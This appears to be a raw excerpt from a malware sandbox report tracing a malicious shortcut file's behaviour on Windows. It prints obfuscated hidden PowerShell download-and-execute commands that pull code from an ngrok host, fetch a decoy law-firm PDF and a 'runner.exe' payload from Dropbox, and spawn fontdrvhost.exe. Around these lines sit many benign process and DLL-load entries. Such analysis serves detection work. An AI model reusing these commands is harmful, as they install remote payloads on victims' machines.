                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041B4B0 OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceStatus,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceW,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,26_2_0041B4B0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-b96944b1-fc36-a7801a-f3dda4a79090}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8544:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nd5bi5pb.tas.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: 751ietQPnX.lnkReversingLabs: Detection: 18%
                      Source: 854113748.exeString found in binary or memory: -InstallNative
                      Source: 854113748.exeString found in binary or memory: -InstallNative
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1976,i,479339844209240994,6957522588551196104,262144 /prefetch:3
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6528 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1027599800.pdf
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=2128,i,4843216233513846130,16606171289243587075,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=3404 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8376 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:6
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1108 --field-trial-handle=1948,i,14212657581130048292,735076137658541707,262144 /prefetch:3
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1996,i,241946409549104947,2634262981403856413,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 444
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 148
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6708 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1976,i,479339844209240994,6957522588551196104,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:3Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6528 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=3404 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8376 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:6Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6708 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1027599800.pdf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=2128,i,4843216233513846130,16606171289243587075,262144 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1108 --field-trial-handle=1948,i,14212657581130048292,735076137658541707,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1996,i,241946409549104947,2634262981403856413,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
